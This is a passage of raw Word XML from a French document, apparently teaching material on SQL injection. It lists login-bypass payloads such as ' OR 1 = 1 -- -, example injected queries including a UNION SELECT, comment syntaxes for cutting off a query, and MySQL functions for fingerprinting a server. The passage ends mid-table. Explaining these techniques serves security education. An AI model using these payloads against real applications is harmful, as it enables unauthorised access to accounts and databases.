    <w:p w:rsidR="00652235" w:rsidRPr="00CF0E97" w:rsidRDefault="00652235" w:rsidP="00535FE8">
      <w:pPr>
        <w:pStyle w:val="PrformatHTML"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0E97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' OR 1 = 1 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652235" w:rsidRPr="00CF0E97" w:rsidRDefault="00652235" w:rsidP="00535FE8">
      <w:pPr>
        <w:pStyle w:val="PrformatHTML"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0E97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'='</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652235" w:rsidRPr="00CF0E97" w:rsidRDefault="00652235" w:rsidP="00535FE8">
      <w:pPr>
        <w:pStyle w:val="PrformatHTML"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0E97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'LIKE'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652235" w:rsidRPr="004F619F" w:rsidRDefault="00652235" w:rsidP="00535FE8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F619F">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Exemples</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F619F">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652235" w:rsidRPr="00CF0E97" w:rsidRDefault="00652235" w:rsidP="00535FE8">
      <w:pPr>
        <w:pStyle w:val="PrformatHTML"/>
        <w:spacing w:before="100" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0E97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SELECT * FROM Users WHERE username = 'admin' AND password = '' OR '' = '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC03D3" w:rsidRPr="00FC03D3" w:rsidRDefault="00FC03D3" w:rsidP="00301CCB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:outlineLvl w:val="1"/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</w:pPr>
      <w:r w:rsidRPr="00FC03D3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Commenter la fin d’une requête</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC03D3" w:rsidRPr="00FC03D3" w:rsidRDefault="00FC03D3" w:rsidP="00535FE8">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284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FC03D3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les syntaxes suivantes peuvent être utilisées pour commenter (désactiver) la fin d’une requête à la suite d’une injection :</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilleclaire-Accent1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="776"/>
        <w:gridCol w:w="2356"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FC03D3" w:rsidRPr="00FC03D3" w:rsidTr="00982B10">
        <w:trPr>
          <w:cnfStyle w:val="100000000000"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00FC03D3" w:rsidRPr="00FC03D3" w:rsidRDefault="00FC03D3" w:rsidP="00FC03D3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC03D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00FC03D3" w:rsidRPr="00FC03D3" w:rsidRDefault="00FC03D3" w:rsidP="00FC03D3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:cnfStyle w:val="100000000000"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC03D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Hash </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FC03D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>commentaire</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC03D3" w:rsidRPr="00FC03D3" w:rsidTr="00982B10">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00FC03D3" w:rsidRPr="00FC03D3" w:rsidRDefault="00FC03D3" w:rsidP="00FC03D3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC03D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00FC03D3" w:rsidRPr="00FC03D3" w:rsidRDefault="00FC03D3" w:rsidP="00FC03D3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:cnfStyle w:val="00000010000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FC03D3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C-style </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FC03D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>commentaire</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC03D3" w:rsidRPr="00FC03D3" w:rsidTr="00982B10">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00FC03D3" w:rsidRPr="00FC03D3" w:rsidRDefault="00FC03D3" w:rsidP="00FC03D3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC03D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>– -</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00FC03D3" w:rsidRPr="00FC03D3" w:rsidRDefault="00FC03D3" w:rsidP="00FC03D3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:cnfStyle w:val="00000001000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FC03D3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SQL </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FC03D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>commentaire</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC03D3" w:rsidRPr="00FC03D3" w:rsidTr="00982B10">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00FC03D3" w:rsidRPr="00FC03D3" w:rsidRDefault="00FC03D3" w:rsidP="00FC03D3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC03D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>;%00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00FC03D3" w:rsidRPr="00FC03D3" w:rsidRDefault="00FC03D3" w:rsidP="00FC03D3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:cnfStyle w:val="00000010000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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FC03D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Nullbyte,fin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FC03D3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de </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FC03D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>chaîne</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC03D3" w:rsidRPr="00FC03D3" w:rsidTr="00982B10">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00FC03D3" w:rsidRPr="00FC03D3" w:rsidRDefault="00FC03D3" w:rsidP="00FC03D3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC03D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00FC03D3" w:rsidRPr="00FC03D3" w:rsidRDefault="00FC03D3" w:rsidP="00FC03D3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:cnfStyle w:val="00000001000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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FC03D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>backtick</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00982B10" w:rsidRPr="004861A6" w:rsidRDefault="003E4F3E" w:rsidP="004861A6">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="1"/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</w:pPr>
      <w:r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Table</w:t>
      </w:r>
      <w:r w:rsidR="00982B10" w:rsidRPr="004861A6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 xml:space="preserve"> 5.4 </w:t>
      </w:r>
      <w:r w:rsidR="00982B10" w:rsidRPr="004861A6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Commenter la fin d’une requête</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC03D3" w:rsidRPr="004861A6" w:rsidRDefault="00FC03D3" w:rsidP="00535FE8">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004861A6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exemples</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004861A6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:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC03D3" w:rsidRPr="00CF0E97" w:rsidRDefault="00FC03D3" w:rsidP="00535FE8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ind w:left="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0E97">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SELECT * FROM Table WHERE username = '' OR 1=1 -- -' AND password = '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF0E97" w:rsidRPr="00CF0E97" w:rsidRDefault="00FC03D3" w:rsidP="00B2205B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ind w:left="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0E97">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SELECT * FROM Table WHERE data = '' UNION SELECT 1, 2, 3`';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006903B3" w:rsidRDefault="003C016A" w:rsidP="00D71E78">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Fonctions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mots</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>clés</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilleclaire-Accent1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4286"/>
        <w:gridCol w:w="4842"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidTr="004A3E60">
        <w:trPr>
          <w:cnfStyle w:val="100000000000"/>
          <w:trHeight w:val="404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pStyle w:val="Paragraphedeliste"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="120"/>
              <w:ind w:left="0"/>
              <w:outlineLvl w:val="1"/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</w:pPr>
            <w:r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 xml:space="preserve">Tester la version </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4842" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidRDefault="00643938" w:rsidP="00057EC1">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="120"/>
              <w:cnfStyle w:val="100000000000"/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</w:pPr>
            <w:r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version</w:t>
            </w:r>
            <w:r w:rsidR="00F61AC2"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(), @@</w:t>
            </w:r>
            <w:r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version</w:t>
            </w:r>
            <w:r w:rsidR="00F61AC2"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, @@</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r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global</w:t>
            </w:r>
            <w:r w:rsidR="00F61AC2"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.</w:t>
            </w:r>
            <w:r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version</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidTr="004A3E60">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
          <w:trHeight w:val="389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bidi w:val="0"/>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="120"/>
              <w:outlineLvl w:val="1"/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</w:pPr>
            <w:r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 xml:space="preserve">Nom d’hôte du </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r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serveur</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4842" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidRDefault="00643938" w:rsidP="00057EC1">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="120"/>
              <w:cnfStyle w:val="00000010000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>@@hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidTr="004A3E60">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
          <w:trHeight w:val="404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pStyle w:val="Titre2"/>
              <w:spacing w:after="120" w:afterAutospacing="0"/>
              <w:outlineLvl w:val="1"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D05FD5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Serveur UID et adresse MAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4842" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidRDefault="00643938" w:rsidP="00057EC1">
            <w:pPr>
              <w:pStyle w:val="Paragraphedeliste"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="120"/>
              <w:ind w:left="0"/>
              <w:outlineLvl w:val="1"/>
              <w:cnfStyle w:val="00000001000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</w:rPr>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00F61AC2" w:rsidRPr="00D05FD5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidTr="004A3E60">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
          <w:trHeight w:val="674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bidi w:val="0"/>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="120"/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  <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r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Utilisateur courant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4842" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidRDefault="00F61AC2" w:rsidP="00057EC1">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="120"/>
              <w:cnfStyle w:val="000000100000"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr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user(), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>current_user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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(), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>current_user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>system_user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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(), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>session_user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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>()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidTr="004A3E60">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
          <w:trHeight w:val="404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bidi w:val="0"/>
              <w:spacing w:after="120"/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</w:pP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 xml:space="preserve">Base de données courante </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4842" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidRDefault="00F61AC2" w:rsidP="00057EC1">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:cnfStyle w:val="000000010000"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D05FD5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
